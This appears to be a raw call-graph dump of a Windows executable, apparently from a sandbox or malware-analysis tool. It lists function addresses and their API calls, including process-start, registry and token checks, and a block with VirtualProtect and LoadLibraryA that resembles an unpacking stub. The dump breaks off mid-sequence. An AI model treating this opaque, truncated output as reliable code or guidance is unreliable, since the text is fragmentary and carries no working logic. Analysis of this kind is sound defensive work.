745bfd 59 API calls 97983 74610f 97982->97983 97984 7377c7 59 API calls 97983->97984 97985 74611a 97984->97985 97986 750f36 Mailbox 59 API calls 97985->97986 97987 73fa68 97986->97987 97988 746259 97987->97988 97989 746267 97988->97989 97990 7377c7 59 API calls 97989->97990 97991 746272 97990->97991 97992 7377c7 59 API calls 97991->97992 97993 74627d 97992->97993 97994 7377c7 59 API calls 97993->97994 97995 746288 97994->97995 97996 7377c7 59 API calls 97995->97996 97997 746293 97996->97997 97998 745bfd 59 API calls 97997->97998 97999 74629e 97998->97999 98000 750f36 Mailbox 59 API calls 97999->98000 98001 7462a5 RegisterClipboardFormatW 98000->98001 98001->97948 98004 74ff2e 98003->98004 98005 785ac5 98003->98005 98006 750f36 Mailbox 59 API calls 98004->98006 98033 799b90 60 API calls 98005->98033 98008 74ff36 98006->98008 98008->97952 98009 785ad0 98010->97959 98011->97961 98034 797296 65 API calls 98011->98034 98013 7377c7 59 API calls 98012->98013 98014 750167 98013->98014 98015 7377c7 59 API calls 98014->98015 98016 75016f 98015->98016 98017 7377c7 59 API calls 98016->98017 98018 7500bb 98017->98018 98018->97968 98020 737da5 98019->98020 98021 737d38 __NMSG_WRITE 98019->98021 98022 737e8c 59 API calls 98020->98022 98023 737d73 98021->98023 98024 737d4e 98021->98024 98027 737d56 _memmove 98022->98027 98029 738189 59 API calls Mailbox 98023->98029 98028 738087 59 API calls Mailbox 98024->98028 98027->97973 98028->98027 98029->98027 98031 7377c7 59 API calls 98030->98031 98032 745c05 98031->98032 98032->97982 98033->98009 98036 752dd0 __initptd 98035->98036 98043 753397 98036->98043 98042 752df7 __initptd 98042->97964 98060 759d8b 98043->98060 98045 752dd9 98046 752e08 RtlDecodePointer RtlDecodePointer 98045->98046 98047 752e35 98046->98047 98048 752de5 98046->98048 98047->98048 98106 758924 59 API calls 2 library calls 98047->98106 98057 752e02 98048->98057 98050 752e98 RtlEncodePointer RtlEncodePointer 98050->98048 98051 752e47 98051->98050 98052 752e6c 98051->98052 98107 7589e4 61 API calls 2 library calls 98051->98107 98052->98048 98056 752e86 RtlEncodePointer 98052->98056 98108 7589e4 61 API calls 2 library calls 98052->98108 98055 752e80 98055->98048 98055->98056 98056->98050 98109 7533a0 98057->98109 98061 759d9c 98060->98061 98062 759daf RtlEnterCriticalSection 98060->98062 98067 759e13 98061->98067 98062->98045 98064 759da2 98064->98062 98091 753235 58 API calls 3 library calls 98064->98091 98068 759e1f __initptd 98067->98068 98069 759e40 98068->98069 98070 759e28 98068->98070 98078 759e61 __initptd 98069->98078 98095 75899d 58 API calls 2 library calls 98069->98095 98092 75a2eb 58 API calls __NMSG_WRITE 98070->98092 98073 759e2d 98093 75a348 58 API calls 5 library calls 98073->98093 98074 759e55 98076 759e5c 98074->98076 98077 759e6b 98074->98077 98096 758ca8 58 API calls __getptd_noexit 98076->98096 98082 759d8b __lock 58 API calls 98077->98082 98078->98064 98079 759e34 98094 75321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98079->98094 98084 759e72 98082->98084 98085 759e97 98084->98085 98086 759e7f 98084->98086 98098 752ed5 98085->98098 98097 759fab InitializeCriticalSectionAndSpinCount 98086->98097 98089 759e8b 98104 759eb3 RtlLeaveCriticalSection _doexit 98089->98104 98092->98073 98093->98079 98095->98074 98096->98078 98097->98089 98099 752ede RtlFreeHeap 98098->98099 98103 752f07 _free 98098->98103 98100 752ef3 98099->98100 98099->98103 98105 758ca8 58 API calls __getptd_noexit 98100->98105 98102 752ef9 GetLastError 98102->98103 98103->98089 98104->98078 98105->98102 98106->98051 98107->98052 98108->98055 98112 759ef5 RtlLeaveCriticalSection 98109->98112 98111 752e07 98111->98042 98112->98111 98113 731016 98118 734ad2 98113->98118 98116 752ec0 __cinit 67 API calls 98117 731025 98116->98117 98119 750f36 Mailbox 59 API calls 98118->98119 98120 734ada 98119->98120 98121 73101b 98120->98121 98125 734a94 98120->98125 98121->98116 98126 734aaf 98125->98126 98127 734a9d 98125->98127 98129 734afe 98126->98129 98128 752ec0 __cinit 67 API calls 98127->98128 98128->98126 98130 7377c7 59 API calls 98129->98130 98131 734b16 GetVersionExW 98130->98131 98132 737d2c 59 API calls 98131->98132 98133 734b59 98132->98133 98134 737e8c 59 API calls 98133->98134 98143 734b86 98133->98143 98135 734b7a 98134->98135 98157 737886 98135->98157 98137 734bf1 GetCurrentProcess IsWow64Process 98138 734c0a 98137->98138 98140 734c20 98138->98140 98141 734c89 GetSystemInfo 98138->98141 98139 76dbbd 98153 734c95 98140->98153 98142 734c56 98141->98142 98142->98121 98143->98137 98143->98139 98146 734c32 98149 734c95 2 API calls 98146->98149 98147 734c7d GetSystemInfo 98148 734c47 98147->98148 98148->98142 98151 734c4d FreeLibrary 98148->98151 98150 734c3a GetNativeSystemInfo 98149->98150 98150->98148 98151->98142 98154 734c2e 98153->98154 98155 734c9e LoadLibraryA 98153->98155 98154->98146 98154->98147 98155->98154 98156 734caf GetProcAddress 98155->98156 98156->98154 98158 737894 98157->98158 98159 737e8c 59 API calls 98158->98159 98160 7378a4 98159->98160 98160->98143 98161 85ca00 98162 85ca10 98161->98162 98163 85cb6f VirtualProtect VirtualProtect 98162->98163 98164 85cb2a LoadLibraryA 98162->98164 98168 85cbd4 98163->98168 98167 85cb41 98164->98167 98166 85cb53 GetProcAddress 98166->98167 98169 85cb69 ExitProcess 98166->98169 98167->98162 98167->98166 98170 731055 98175 732649 98170->98175 98173 752ec0 __cinit 67 API calls 98174 731064 98173->98174 98176 7377c7 59 API calls 98175->98176 98177 7326b7 98176->98177 98182 733582 98177->98182 98179 732754 98181 73105a 98179->98181 98185 733416 59 API calls 2 library calls 98179->98185 98181->98173 98186 7335b0 98182->98186 98185->98179 98187 7335a1 98186->98187 98188 7335bd 98186->98188 98187->98179 98188->98187 98189 7335c4 RegOpenKeyExW 98188->98189 98189->98187 98190 7335de RegQueryValueExW 98189->98190 98191 733614 RegCloseKey 98190->98191 98192 7335ff 98190->98192 98191->98187 98192->98191 98193 757dd3 98194 757ddf __initptd 98193->98194 98230 759f88 GetStartupInfoW 98194->98230 98196 757de4 98232 758cfc GetProcessHeap 98196->98232 98198 757e3c 98199 757e47 98198->98199 98315 757f23 58 API calls 3 library calls 98198->98315 98233 759c66 98199->98233 98202 757e4d 98203 757e58 __RTC_Initialize 98202->98203 98316 757f23 58 API calls 3 library calls 98202->98316 98254 75d752 98203->98254 98206 757e67 98207 757e73 GetCommandLineW 98206->98207 98317 757f23 58 API calls 3 library calls 98206->98317 98273 7650a3 GetEnvironmentStringsW 98207->98273 98210 757e72 98210->98207 98213 757e8d 98214 757e98 98213->98214 98318 753235 58 API calls 3 library calls 98213->98318 98283 764ed8 98214->98283 98217 757e9e 98218 757ea9 98217->98218 98319 753235 58 API calls 3 library calls 98217->98319 98297 75326f 98218->98297 98221 757eb1 98222 757ebc __wwincmdln 98221->98222 98320 753235 58 API calls 3 library calls 98221->98320 98303 73492e 98222->98303 98225 757edf 98322 753260 58 API calls _doexit 98225->98322 98226 757ed0 98226->98225 98321 7534d8 58 API calls _doexit 98226->98321 98229 757ee4 __initptd 98231 759f9e 98230->98231 98231->98196 98232->98198 98323 753307 36 API calls 2 library calls 98233->98323 98235 759c6b 98324 759ebc InitializeCriticalSectionAndSpinCount ___lock_fhandle 98235->98324 98237 759c70 98238 759c74 98237->98238 98326 759f0a TlsAlloc 98237->98326 98325 759cdc 61 API calls 2 library calls 98238->98325 98241 759c79 98241->98202 98242 759c86 98242->98238 98243 759c91 98242->98243 98327 758955 98243->98327 98246 759cd3 98335 759cdc 61 API calls 2 library calls 98246->98335 98249 759cb2 98249->98246 98251 759cb8 98249->98251 98250 759cd8 98250->98202 98334 759bb3 58 API calls 3 library calls 98251->98334 98253 759cc0 GetCurrentThreadId 98253->98202 98255 75d75e __initptd 98254->98255 98256 759d8b __lock 58 API calls 98255->98256 98257 75d765 98256->98257 98258 758955 __calloc_crt 58 API calls 98257->98258 98260 75d776 98258->98260 98259 75d7e1 GetStartupInfoW 98266 75d7f6 98259->98266 98270 75d925 98259->98270 98260->98259 98261 75d781 __initptd @_EH4_CallFilterFunc@8 98260->98261 98261->98206 98262 75d9ed 98349 75d9fd RtlLeaveCriticalSection _doexit 98262->98349 98264 758955 __calloc_crt 58 API calls 98264->98266 98265 75d972 GetStdHandle 98265->98270 98266->98264 98268 75d844 98266->98268 98266->98270 98267 75d985 GetFileType 98267->98270 98269 75d878 GetFileType 98268->98269 98268->98270 98347 759fab InitializeCriticalSectionAndSpinCount 98268->98347 98269->98268 98270->98262 98270->98265 98270->98267 98348 759fab InitializeCriticalSectionAndSpinCount 98270->98348 98274 7650b4 98273->98274 98275 757e83 98273->98275 98350 75899d 58 API calls 2 library calls 98274->98350 98279 764c9b GetModuleFileNameW 98275->98279 98277 7650da _memmove 98278 7650f0 FreeEnvironmentStringsW 98277->98278 98278->98275 98280 764ccf _wparse_cmdline 98279->98280 98282 764d0f _wparse_cmdline 98280->98282 98351 75899d 58 API calls 2 library calls 98280->98351 98282->98213 98284 764ef1 __NMSG_WRITE 98283->98284 98285 764ee9 98283->98285 98286 758955 __calloc_crt 58 API calls 98284->98286 98285->98217 98287 764f1a __NMSG_WRITE 98286->98287 98287->98285 98289 758955 __calloc_crt 58 API calls 98287->98289 98290 764f71 98287->98290 98291 764f96 98287->98291 98294 764fad 98287->98294 98352 764787 58 API calls 2 library calls 98287->98352 98288 752ed5 _free 58 API calls 98288->98285 98289->98287 98290->98288 98292 752ed5 _free 58 API calls 98291->98292 98292->98285 98353 758f46 IsProcessorFeaturePresent 98294->98353 98296 764fb9 98296->98217 98298 75327b __IsNonwritableInCurrentImage 98297->98298 98376 75a651 98298->98376 98300 753299 __initterm_e 98301 752ec0 __cinit 67 API calls 98300->98301 98302 7532b8 _doexit __IsNonwritableInCurrentImage 98300->98302 98301->98302 98302->98221 98304 734948 98303->98304 98314 7349e7 98303->98314 98305 734982 74B1C8D0 98304->98305 98379 7534ec 98305->98379 98309 7349ae 98391 734a5b SystemParametersInfoW SystemParametersInfoW 98309->98391 98311 7349ba 98392 733b4c 98311->98392 98313 7349c2 SystemParametersInfoW 98313->98314 98314->98226 98315->98199 98316->98203 98317->98210 98321->98225 98322->98229 98323->98235 98324->98237 98325->98241 98326->98242 98328 75895c 98327->98328 98330 758997 98328->98330 98332 75897a 98328->98332 98336 765376 98328->98336 98330->98246 98333 759f66 TlsSetValue 98330->98333 98332->98328 98332->98330 98344 75a2b2 Sleep 98332->98344 98333->98249 98334->98253 98335->98250 98337 765381 98336->98337 98343 76539c 98336->98343 98338 76538d 98337->98338 98337->98343 98345 758ca8 58 API calls __getptd_noexit 98338->98345 98339 7653ac RtlAllocateHeap 98341 765392 98339->98341 98339->98343 98341->98328 98343->98339 98343->98341 98346 753521 RtlDecodePointer 98343->98346 98344->98332 98345->98341 98346->98343 98347->98268 98348->98270 98349->98261 98350->98277 98351->98282 98352->98287 98354 758f51 98353->98354 98359 758dd9 98354->98359 98358 758f6c 98358->98296 98360 758df3 _memset ___raise_securityfailure 98359->98360 98361 758e13 IsDebuggerPresent 98360->98361 98367 75a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 98361->98367 98364 758ed7 ___raise_securityfailure 98368 75c776 98364->98368 98365 758efa 98366 75a2c0 GetCurrentProcess TerminateProcess 98365->98366 98366->98358 98367->98364 98369 75c780 IsProcessorFeaturePresent 98368->98369 98370 75c77e 98368->98370 98372 765a8a 98369->98372 98370->98365 98375 765a39 5 API calls ___raise_securityfailure 98372->98375 98374 765b6d 98374->98365 98375->98374 98377 75a654 RtlEncodePointer 98376->98377 98377->98377 98378 75a66e 98377->98378 98378->98300 98380 759d8b __lock 58 API calls 98379->98380 98381 7534f7 RtlDecodePointer RtlEncodePointer 98380->98381 98444 759ef5 RtlLeaveCriticalSection 98381->98444 98383 7349a7 98384 753554 98383->98384 98385 75355e 98384->98385 98386 753578 98384->98386 98385->98386 98445 758ca8 58 API calls __getptd_noexit 98385->98445 98386->98309 98388 753568 98446 758f36 9 API calls __write_nolock 98388->98446 98390 753573 98390->98309 98391->98311 98393 733b59 __write_nolock 98392->98393 98394 7377c7 59 API calls 98393->98394 98395 733b63 GetCurrentDirectoryW 98394->98395 98447 733778 98395->98447 98397 733b8c IsDebuggerPresent 98398 733b9a 98397->98398 98399 76d3dd MessageBoxA 98397->98399 98400 733c73 98398->98400 98402 76d3f7 98398->98402 98403 733bb7 98398->98403 98399->98402 98401 733c7a SetCurrentDirectoryW 98400->98401 98404 733c87 Mailbox 98401->98404 98647 737373 59 API calls Mailbox 98402->98647 98528 7373e5 98403->98528 98404->98313 98407 76d407 98412 76d41d SetCurrentDirectoryW 98407->98412 98409 733bd5 GetFullPathNameW 98410 737d2c 59 API calls 98409->98410 98411 733c10 98410->98411 98544 740a8d 98411->98544 98412->98404 98415 733c2e 98416 733c38 98415->98416 98648 794a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 98415->98648 98560 733a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98416->98560 98420 76d43a 98420->98416 98422 76d44b 98420->98422 98649 734864 98422->98649 98423 733c42 98425 733c55 98423->98425 98645 7343db 68 API calls _memset 98423->98645 98568 740b30 98425->98568 98426 76d453 98429 737f41 59 API calls 98426->98429 98431 76d460 98429->98431 98430 733c60 98430->98400 98646 7344cb Shell_NotifyIconW _memset 98430->98646 98432 76d48f 98431->98432 98433 76d46a 98431->98433 98436 737e0b 59 API calls 98432->98436 98656 737e0b 98433->98656 98437 76d48b GetForegroundWindow ShellExecuteW 98436->98437 98441 76d4bf Mailbox 98437->98441 98441->98400 98443 737e0b 59 API calls 98443->98437 98444->98383 98445->98388 98446->98390 98448 7377c7 59 API calls 98447->98448 98449 73378e 98448->98449 98672 733d43 98449->98672 98451 7337ac 98452 734864 61 API calls 98451->98452 98453 7337c0 98452->98453 98454 737f41 59 API calls 98453->98454 98455 7337cd 98454->98455 98686 734f3d 98455->98686 98458 76d2de 98746 799604 98458->98746 98460 7337ee Mailbox 98710 7381a7 98460->98710 98463 76d2fd 98464 752ed5 _free 58 API calls 98463->98464 98467 76d30a 98464->98467 98469 734faa 84 API calls 98467->98469 98471 76d313 98469->98471 98475 733ee2 59 API calls 98471->98475 98472 737f41 59 API calls 98473 73381a 98472->98473 98717 738620 98473->98717 98477 76d32e 98475->98477 98476 73382c Mailbox 98478 737f41 59 API calls 98476->98478 98479 733ee2 59 API calls 98477->98479 98480 733852 98478->98480 98481 76d34a 98479->98481 98482 738620 69 API calls 98480->98482 98483 734864 61 API calls 98481->98483 98484 733861 Mailbox 98482->98484 98485 76d36f 98483->98485 98488 7377c7 59 API calls 98484->98488 98486 733ee2 59 API calls 98485->98486 98487 76d37b 98486->98487 98489 7381a7 59 API calls 98487->98489 98490 73387f 98488->98490 98491 76d389 98489->98491 98721 733ee2 98490->98721 98493 733ee2 59 API calls 98491->98493 98495 76d398 98493->98495 98501 7381a7 59 API calls 98495->98501 98497 733899 98497->98471 98498 7338a3 98497->98498 98499 75307d _W_store_winword 60 API calls 98498->98499 98500 7338ae 98499->98500 98500->98477 98502 7338b8 98500->98502 98503 76d3ba 98501->98503 98504 75307d _W_store_winword 60 API calls 98502->98504 98505 733ee2 59 API calls 98503->98505 98506 7338c3 98504->98506 98507 76d3c7 98505->98507 98506->98481 98508 7338cd 98506->98508 98507->98507 98509 75307d _W_store_winword 60 API calls 98508->98509 98510 7338d8 98509->98510 98510->98495 98511 733919 98510->98511 98513 733ee2 59 API calls 98510->98513 98511->98495 98512 733926 98511->98512 98515 73942e 59 API calls 98512->98515 98514 7338fc 98513->98514 98516 7381a7 59 API calls 98514->98516 98517 733936 98515->98517 98518 73390a 98516->98518 98519 7391b0 59 API calls 98517->98519 98520 733ee2 59 API calls 98518->98520 98521 733944 98519->98521 98520->98511 98737 739040 98521->98737 98523 7393ea 59 API calls 98525 733961 98523->98525 98524 739040 60 API calls 98524->98525 98525->98523 98525->98524 98526 733ee2 59 API calls 98525->98526 98527 7339a7 Mailbox 98525->98527 98526->98525 98527->98397 98529 7373f2 __write_nolock 98528->98529 98530 73740b 98529->98530 98531 76ed7b _memset 98529->98531 99365 7348ae 98530->99365 98533 76ed97 762ED0D0 98531->98533 98535 76ede6 98533->98535 98537 737d2c 59 API calls 98535->98537 98539 76edfb 98537->98539 98539->98539 98541 737429 99393 7369ca 98541->99393 98545 740a9a __write_nolock 98544->98545 99637 736ee0 98545->99637 98547 740a9f 98548 733c26 98547->98548 99648 7412fe 89 API calls 98547->99648 98548->98407 98548->98415 98550 740aac 98550->98548 99649 744047 91 API calls Mailbox 98550->99649 98552 740ab5 98552->98548 98553 740ab9 GetFullPathNameW 98552->98553 98554 737d2c 59 API calls 98553->98554 98555 740ae5 98554->98555 98556 737d2c 59 API calls 98555->98556 98557 740af2 98556->98557 98558 775004 _wcscat 98557->98558 98559 737d2c 59 API calls 98557->98559 98559->98548 98561 733ac2 LoadImageW RegisterClassExW 98560->98561 98562 76d3cc 98560->98562 99652 733041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98561->99652 99656 7348fe LoadImageW EnumResourceNamesW 98562->99656 98566 76d3d5 98567 7339e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98567->98423 98569 77501c 98568->98569 98581 740b55 98568->98581 99712 799ed4 89 API calls 4 library calls 98569->99712 98571 740e5a 98571->98430 98573 741044 98573->98571 98575 741051 98573->98575 99710 7411f3 341 API calls Mailbox 98575->99710 98576 740bab PeekMessageW 98643 740b65 Mailbox 98576->98643 98579 741058 LockWindowUpdate DestroyWindow GetMessageW 98579->98571 98583 74108a 98579->98583 98580 740e44 98580->98571 99709 7411d0 10 API calls Mailbox 98580->99709 98581->98643 99713 739fbd 60 API calls 98581->99713 99714 78669f 341 API calls 98581->99714 98582 7751da Sleep 98582->98643 98585 775fb1 TranslateMessage DispatchMessageW GetMessageW 98583->98585 98585->98585 98586 775fe1 98585->98586 98586->98571 98587 739fbd 60 API calls 98587->98643 98588 741005 TranslateMessage DispatchMessageW 98589 740fa3 PeekMessageW 98588->98589 98589->98643 98590 7750a9 TranslateAcceleratorW 98590->98589 98590->98643 98591 740e73 timeGetTime 98591->98643 98592 775b78 WaitForSingleObject 98597 775b95 GetExitCodeProcess CloseHandle 98592->98597 98592->98643 98594 740fbf Sleep 98626 740fd0 Mailbox 98594->98626 98595 7381a7 59 API calls 98595->98643 98596 7377c7 59 API calls 98596->98626 98627 7410f5 98597->98627 98598 750f36 59 API calls Mailbox 98598->98643 98599 775e51 Sleep 98599->98626 98601 75034a timeGetTime 98601->98626 98603 7410ae timeGetTime 99711 739fbd 60 API calls 98603->99711 98606 775ee8 GetExitCodeProcess 98611 775f14 CloseHandle 98606->98611 98612 775efe WaitForSingleObject 98606->98612 98607 739997 84 API calls 98607->98643 98609 7b5f8e 110 API calls 98609->98626 98610 73b93d 109 API calls 98610->98626 98611->98626 98612->98611 98612->98643 98614 775bcd 98614->98627 98615 775f70 Sleep 98615->98643 98616 7753d1 Sleep 98616->98643 98619 737f41 59 API calls 98619->98626 98626->98596 98626->98601 98626->98606 98626->98609 98626->98610 98626->98614 98626->98615 98626->98616 98626->98619 98626->98627 98626->98643 99721 792700 60 API calls 98626->99721 99722 739fbd 60 API calls 98626->99722 99723 738b13 69 API calls Mailbox 98626->99723 99724 73b89c 341 API calls 98626->99724 99725 786830 60 API calls 98626->99725 99726 7952eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98626->99726 99727 793c99 66 API calls Mailbox 98626->99727 98627->98430 98630 799ed4 89 API calls 98630->98643 98631 739df0 59 API calls Mailbox 98631->98643 98632 73a000 314 API calls 98632->98643 98633 738620 69 API calls 98633->98643 98635 7863f2 59 API calls Mailbox 98635->98643 98636 77592e VariantClear 98636->98643 98637 7759c4 VariantClear 98637->98643 98638 775772 VariantClear 98638->98643 98639 738e34 59 API calls Mailbox 98639->98643 98640 7871e5 59 API calls 98640->98643 98641 737f41 59 API calls 98641->98643 98642 738b13 69 API calls 98642->98643 98643->98576 98643->98580 98643->98582 98643->98587 98643->98588 98643->98589 98643->98590 98643->98591 98643->98592 98643->98594 98643->98595 98643->98598 98643->98599 98643->98603 98643->98607 98643->98626 98643->98627 98643->98630 98643->98631 98643->98632 98643->98633 98643->98635 98643->98636 98643->98637 98643->98638 98643->98639 98643->98640 98643->98641 98643->98642 98644 73b89c 314 API calls 98643->98644 99657 73e800 98643->99657 99688 73f5c0 98643->99688 99706 73e580 341 API calls 98643->99706 99707 73fe40 341 API calls 2 library calls 98643->99707 99708 7331ce IsDialogMessageW GetClassLongW 98643->99708 99715 7b6081 59 API calls 98643->99715 99716 799abe 59 API calls Mailbox 98643->99716 99717 78d801 59 API calls 98643->99717 99718 786363 59 API calls 2 library calls 98643->99718 99719 738561 59 API calls 98643->99719 99720 73843f 59 API calls Mailbox 98643->99720 98644->98643 98645->98425 98646->98400 98647->98407 98648->98420 98650 761ac0 __write_nolock 98649->98650 98651 734871 GetModuleFileNameW 98650->98651 98652 737f41 59 API calls 98651->98652 98653 734897 98652->98653 98654 7348ae 60 API calls 98653->98654 98655 7348a1 Mailbox 98654->98655 98655->98426 98657 76f0a3 98656->98657 98658 737e1f 98656->98658 100014 738189 59 API calls Mailbox 98657->100014 100009 737db0 98658->100009 98661 737e2a 98663 737c8e 98661->98663 98662 76f0ae __NMSG_WRITE _memmove 98664 76efc4 98663->98664 98665 737ca0 98663->98665 100022 787f03 59 API calls _memmove 98664->100022 100016 737bb1 98665->100016 98668 737cac 98668->98443 98669 76efce 98670 7381a7 59 API calls 98669->98670 98671 76efd6 Mailbox 98670->98671 98673 733d50 __write_nolock 98672->98673 98674 737d2c 59 API calls 98673->98674 98679 733eb6 Mailbox 98673->98679 98676 733d82 98674->98676 98684 733db8 Mailbox 98676->98684 98787 737b52 98676->98787 98677 733e89 98678 737f41 59 API calls 98677->98678 98677->98679 98681 733eaa 98678->98681 98679->98451 98680 737f41 59 API calls 98680->98684 98682 733f84 59 API calls 98681->98682 98682->98679 98684->98677 98684->98679 98684->98680 98685 737b52 59 API calls 98684->98685 98790 733f84 98684->98790 98685->98684 98796 734d13 98686->98796 98691 76dc3f 98694 734faa 84 API calls 98691->98694 98692 734f68 LoadLibraryExW 98806 734cc8 98692->98806 98696 76dc46 98694->98696 98697 734cc8 3 API calls 98696->98697 98699 76dc4e 98697->98699 98832 73506b 98699->98832 98700 734f8f 98700->98699 98701 734f9b 98700->98701 98703 734faa 84 API calls 98701->98703 98705 7337e6 98703->98705 98705->98458 98705->98460 98707 76dc75 98840 735027 98707->98840 98709 76dc82 98711 7381b2 98710->98711 98712 733801 98710->98712 99094 7380d7 59 API calls 2 library calls 98711->99094 98714 7393ea 98712->98714 98715 750f36 Mailbox 59 API calls 98714->98715 98716 73380d 98715->98716 98716->98472 98718 73862b 98717->98718 98720 738652 98718->98720 99095 738b13 69 API calls Mailbox 98718->99095 98720->98476 98722 733f05 98721->98722 98723 733eec 98721->98723 98725 737d2c 59 API calls 98722->98725 98724 7381a7 59 API calls 98723->98724 98726 73388b 98724->98726 98725->98726 98727 75307d 98726->98727 98728 7530fe 98727->98728 98729 753089 98727->98729 99098 753110 60 API calls 4 library calls 98728->99098 98736 7530ae 98729->98736 99096 758ca8 58 API calls __getptd_noexit 98729->99096 98732 75310b 98732->98497 98733 753095 99097 758f36 9 API calls __write_nolock 98733->99097 98735 7530a0 98735->98497 98736->98497 98738 76f4d5 98737->98738 98741 739057 98737->98741 98738->98741 99100 738d3b 59 API calls Mailbox 98738->99100 98740 73915f 98740->98525 98741->98740 98742 7391a0 98741->98742 98743 739158 98741->98743 99099 739e9c 60 API calls Mailbox 98742->99099 98744 750f36 Mailbox 59 API calls 98743->98744 98744->98740 98747 735045 85 API calls 98746->98747 98748 799673 98747->98748 99101 7997dd 98748->99101 98751 73506b 74 API calls 98752 7996a0 98751->98752 98753 73506b 74 API calls 98752->98753 98754 7996b0 98753->98754 98755 73506b 74 API calls 98754->98755 98756 7996cb 98755->98756 98757 73506b 74 API calls 98756->98757 98758 7996e6 98757->98758 98759 735045 85 API calls 98758->98759 98760 7996fd 98759->98760 98761 75588c __crtLCMapStringA_stat 58 API calls 98760->98761 98762 799704 98761->98762 98763 75588c __crtLCMapStringA_stat 58 API calls 98762->98763 98764 79970e 98763->98764 98765 73506b 74 API calls 98764->98765 98766 799722 98765->98766 98767 7991b2 GetSystemTimeAsFileTime 98766->98767 98768 799735 98767->98768 98769 79974a 98768->98769 98770 79975f 98768->98770 98771 752ed5 _free 58 API calls 98769->98771 98772 799765 98770->98772 98773 7997c4 98770->98773 98774 799750 98771->98774 99107 798baf 116 API calls __fcloseall 98772->99107 98776 752ed5 _free 58 API calls 98773->98776 98777 752ed5 _free 58 API calls 98774->98777 98779 76d2f1 98776->98779 98777->98779 98778 7997bc 98780 752ed5 _free 58 API calls 98778->98780 98779->98463 98781 734faa 98779->98781 98780->98779 98782 734fb4 98781->98782 98783 734fbb 98781->98783 99108 755516 98782->99108 98785 734fdb FreeLibrary 98783->98785 98786 734fca 98783->98786 98785->98786 98786->98463 98788 737faf 59 API calls 98787->98788 98789 737b5d 98788->98789 98789->98676 98791 733f92 98790->98791 98795 733fb4 _memmove 98790->98795 98793 750f36 Mailbox 59 API calls 98791->98793 98792 750f36 Mailbox 59 API calls 98794 733fc8 98792->98794 98793->98795 98794->98684 98795->98792 98845 734d61 98796->98845 98799 734d3a 98800 734d53 98799->98800 98801 734d4a FreeLibrary 98799->98801 98803 7553cb 98800->98803 98801->98800 98802 734d61 2 API calls 98802->98799 98849 7553e0 98803->98849 98805 734f5c 98805->98691 98805->98692 99009 734d94 98806->99009 98809 734ced 98810 734d08 98809->98810 98811 734cff FreeLibrary 98809->98811 98813 734dd0 98810->98813 98811->98810 98812 734d94 2 API calls 98812->98809 98814 750f36 Mailbox 59 API calls 98813->98814 98815 734de5 98814->98815 99013 73538e 98815->99013 98817 734df1 _memmove 98818 734e2c 98817->98818 98819 734f21 98817->98819 98820 734ee9 98817->98820 98821 735027 69 API calls 98818->98821 99027 7999c4 95 API calls 98819->99027 99016 734fe9 CreateStreamOnHGlobal 98820->99016 98829 734e35 98821->98829 98824 73506b 74 API calls 98824->98829 98825 734ec9 98825->98700 98827 76dc00 98828 735045 85 API calls 98827->98828 98830 76dc14 98828->98830 98829->98824 98829->98825 98829->98827 99022 735045 98829->99022 98831 73506b 74 API calls 98830->98831 98831->98825 98833 73507d 98832->98833 98836 76dd26 98832->98836 99051 755752 98833->99051 98837 7991b2 99071 799008 98837->99071 98839 7991c8 98839->98707 98841 735036 98840->98841 98842 76dce9 98840->98842 99076 755dd0 98841->99076 98844 73503e 98844->98709 98846 734d2e 98845->98846 98847 734d6a LoadLibraryA 98845->98847 98846->98799 98846->98802 98847->98846 98848 734d7b GetProcAddress 98847->98848 98848->98846 98851 7553ec __initptd 98849->98851 98850 7553ff 98898 758ca8 58 API calls __getptd_noexit 98850->98898 98851->98850 98853 755430 98851->98853 98868 760668 98853->98868 98854 755404 98899 758f36 9 API calls __write_nolock 98854->98899 98857 755435 98858 75543e 98857->98858 98859 75544b 98857->98859 98900 758ca8 58 API calls __getptd_noexit 98858->98900 98861 755475 98859->98861 98862 755455 98859->98862 98883 760787 98861->98883 98901 758ca8 58 API calls __getptd_noexit 98862->98901 98867 75540f __initptd @_EH4_CallFilterFunc@8 98867->98805 98869 760674 __initptd 98868->98869 98870 759d8b __lock 58 API calls 98869->98870 98871 760682 98870->98871 98872 7606fd 98871->98872 98877 759e13 __mtinitlocknum 58 API calls 98871->98877 98881 7606f6 98871->98881 98906 756dcd 59 API calls __lock 98871->98906 98907 756e37 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98871->98907 98908 75899d 58 API calls 2 library calls 98872->98908 98875 760704 98875->98881 98909 759fab InitializeCriticalSectionAndSpinCount 98875->98909 98877->98871 98879 760773 __initptd 98879->98857 98880 76072a RtlEnterCriticalSection 98880->98881 98903 76077e 98881->98903 98892 7607a7 __wopenfile 98883->98892 98884 7607c1 98914 758ca8 58 API calls __getptd_noexit 98884->98914 98886 76097c 98886->98884 98890 7609df 98886->98890 98887 7607c6 98915 758f36 9 API calls __write_nolock 98887->98915 98889 755480 98902 7554a2 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 98889->98902 98911 768721 98890->98911 98892->98884 98892->98886 98892->98892 98916 75394b 60 API calls 3 library calls 98892->98916 98894 760975 98894->98886 98917 75394b 60 API calls 3 library calls 98894->98917 98896 760994 98896->98886 98918 75394b 60 API calls 3 library calls 98896->98918 98898->98854 98899->98867 98900->98867 98901->98867 98902->98867 98910 759ef5 RtlLeaveCriticalSection 98903->98910 98905 760785 98905->98879 98906->98871 98907->98871 98908->98875 98909->98880 98910->98905 98919 767f05 98911->98919 98913 76873a 98913->98889 98914->98887 98915->98889 98916->98894 98917->98896 98918->98886 98920 767f11 __initptd 98919->98920 98921 767f27 98920->98921 98924 767f5d 98920->98924 99006 758ca8 58 API calls __getptd_noexit 98921->99006 98923 767f2c 99007 758f36 9 API calls __write_nolock 98923->99007 98930 767fce 98924->98930 98927 767f79 99008 767fa2 RtlLeaveCriticalSection __unlock_fhandle 98927->99008 98929 767f36 __initptd 98929->98913 98931 767fee 98930->98931 98932 75465a __wsopen_nolock 58 API calls 98931->98932 98935 76800a 98932->98935 98933 758f46 __invoke_watson 8 API calls 98934 768720 98933->98934 98937 767f05 __wsopen_helper 103 API calls 98934->98937 98936 768044 98935->98936 98944 768067 98935->98944 98978 768141 98935->98978 98938 758c74 __write_nolock 58 API calls 98936->98938 98939 